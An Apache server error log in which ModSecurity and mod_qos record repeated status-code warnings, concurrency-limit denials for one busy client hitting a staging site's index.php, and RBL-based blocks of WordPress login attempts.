[Tue May 26 19:59:27.297722 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255nQAAAd8"]
[Tue May 26 19:59:27.301603 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255lAAAAb0"]
[Tue May 26 19:59:27.306640 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OqgAAALI"]
[Tue May 26 19:59:27.314196 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255oQAAAak"]
[Tue May 26 19:59:27.316209 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OpQAAAMw"]
[Tue May 26 19:59:27.322477 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvQQAAABA"]
[Tue May 26 19:59:27.345391 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OqAAAALQ"]
[Tue May 26 19:59:27.352645 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OrgAAANY"]
[Tue May 26 19:59:27.353906 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvQAAAAAk"]
[Tue May 26 19:59:27.355608 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OsgAAAM4"]
[Tue May 26 19:59:27.360798 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvcgAAAFY"]
[Tue May 26 19:59:27.363815 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255pAAAAfY"]
[Tue May 26 19:59:27.369450 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OrQAAANg"]
[Tue May 26 19:59:27.374837 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp255xQAAAe8"]
[Tue May 26 19:59:27.374859 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OtQAAALg"]
[Tue May 26 19:59:27.379480 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvdwAAADk"]
[Tue May 26 19:59:27.379692 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvRQAAABc"]
[Tue May 26 19:59:27.382038 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvdgAAAF0"]
[Tue May 26 19:59:27.403611 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvgAAAAB8"]
[Tue May 26 19:59:27.406044 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRoZZc2DoU1lPnP1OyAAAAIs"]
[Tue May 26 19:59:27.420548 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszveAAAACs"]
[Tue May 26 19:59:27.422052 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvdQAAAFk"]
[Tue May 26 19:59:27.429504 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvfwAAAGs"]
[Tue May 26 19:59:27.455361 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvgwAAAAg"]
[Tue May 26 19:59:27.460461 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRoZZc2DoU1lPnP1OygAAAMM"]
[Tue May 26 19:59:27.462013 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp255ygAAAfU"]
[Tue May 26 19:59:27.535831 2026] [security2:error] [pid 93576:tid 93774] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuR2DRMqfxdEDkoszvqQAAAD4"]
[Tue May 26 19:59:27.879411 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR2DRMqfxdEDkoszv1wAAADI
[Tue May 26 19:59:27.879597 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuR2DRMqfxdEDkoszv2AAAAFs
[Tue May 26 19:59:27.880144 2026] [qos:error] [pid 106517:tid 106666] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR4ZZc2DoU1lPnP1PAAAAAJU
[Tue May 26 19:59:27.880977 2026] [qos:error] [pid 106517:tid 106665] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR4ZZc2DoU1lPnP1PAQAAAJQ
[Tue May 26 19:59:27.882607 2026] [qos:error] [pid 106517:tid 106657] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR4ZZc2DoU1lPnP1PAwAAAIw
[Tue May 26 19:59:27.889190 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR2DRMqfxdEDkoszv3gAAAEE
[Tue May 26 19:59:27.889555 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR2DRMqfxdEDkoszv3AAAAEg
[Tue May 26 19:59:27.890092 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR2DRMqfxdEDkoszv4AAAAGI
[Tue May 26 19:59:27.897420 2026] [qos:error] [pid 106517:tid 106729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuR4ZZc2DoU1lPnP1PBwAAANM
[Tue May 26 19:59:27.897469 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuR2DRMqfxdEDkoszv4gAAAGM
[Tue May 26 19:59:27.907441 2026] [security2:error] [pid 93576:tid 93590] [remote 211.23.68.235:2282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuR2DRMqfxdEDkoszvwAAAIQs"]
[Tue May 26 19:59:28.279914 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRoZZc2DoU1lPnP1OyQAAAL8"]
[Tue May 26 19:59:28.284930 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvnAAAACo"]
[Tue May 26 19:59:28.295666 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp2550AAAAgw"]
[Tue May 26 19:59:28.297875 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvmwAAAAM"]
[Tue May 26 19:59:28.304609 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp2552gAAAfc"]
[Tue May 26 19:59:28.304837 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvngAAAGo"]
[Tue May 26 19:59:28.305548 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRoZZc2DoU1lPnP1O0gAAAMY"]
[Tue May 26 19:59:28.308346 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp2553QAAAdY"]
[Tue May 26 19:59:28.323013 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp2553AAAAcc"]
[Tue May 26 19:59:28.329690 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvhgAAAAQ"]
[Tue May 26 19:59:28.336460 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvnQAAAGk"]
[Tue May 26 19:59:28.340166 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRkqK9k_ZUB2Vp2552wAAAds"]
[Tue May 26 19:59:28.353897 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp255_wAAAY8"]
[Tue May 26 19:59:28.359549 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRmDRMqfxdEDkoszvhwAAAH8"]
[Tue May 26 19:59:28.366455 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256AwAAAg0"]
[Tue May 26 19:59:28.373719 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O3QAAALk"]
[Tue May 26 19:59:28.379788 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256CAAAAao"]
[Tue May 26 19:59:28.382367 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256BAAAAag"]
[Tue May 26 19:59:28.387619 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O3AAAAOU"]
[Tue May 26 19:59:28.392908 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256AQAAAaM"]
[Tue May 26 19:59:28.400897 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256BgAAAc4"]
[Tue May 26 19:59:28.406388 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256BwAAAgY"]
[Tue May 26 19:59:28.406525 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256BQAAAZ8"]
[Tue May 26 19:59:28.408106 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O5gAAAO8"]
[Tue May 26 19:59:28.408169 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O5wAAANQ"]
[Tue May 26 19:59:28.419815 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256CgAAAb4"]
[Tue May 26 19:59:28.441456 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256DAAAAcs"]
[Tue May 26 19:59:28.441908 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O5AAAAJc"]
[Tue May 26 19:59:28.449596 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O4wAAAOs"]
[Tue May 26 19:59:28.629218 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSGDRMqfxdEDkoszwHgAAADQ
[Tue May 26 19:59:28.629255 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256agAAAeM
[Tue May 26 19:59:28.629886 2026] [qos:error] [pid 106517:tid 106724] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSIZZc2DoU1lPnP1PEAAAAM4
[Tue May 26 19:59:28.630083 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256awAAAeI
[Tue May 26 19:59:28.631989 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSEqK9k_ZUB2Vp256bAAAAeo
[Tue May 26 19:59:28.634832 2026] [qos:error] [pid 106517:tid 106745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSIZZc2DoU1lPnP1PFQAAAOM
[Tue May 26 19:59:28.634937 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSGDRMqfxdEDkoszwIQAAAGY
[Tue May 26 19:59:28.637071 2026] [qos:error] [pid 106517:tid 106744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSIZZc2DoU1lPnP1PFAAAAOI
[Tue May 26 19:59:28.637173 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuSGDRMqfxdEDkoszwIwAAAGY
[Tue May 26 19:59:28.642084 2026] [qos:error] [pid 106517:tid 106746] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSIZZc2DoU1lPnP1PFwAAAOQ
[Tue May 26 19:59:28.642503 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSGDRMqfxdEDkoszwJAAAAC4
[Tue May 26 19:59:28.669588 2026] [security2:error] [pid 93868:tid 93999] [remote 18.209.220.99:10479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256WwABugA"], referer: https://freshmindsolutions.com/wp-login.php
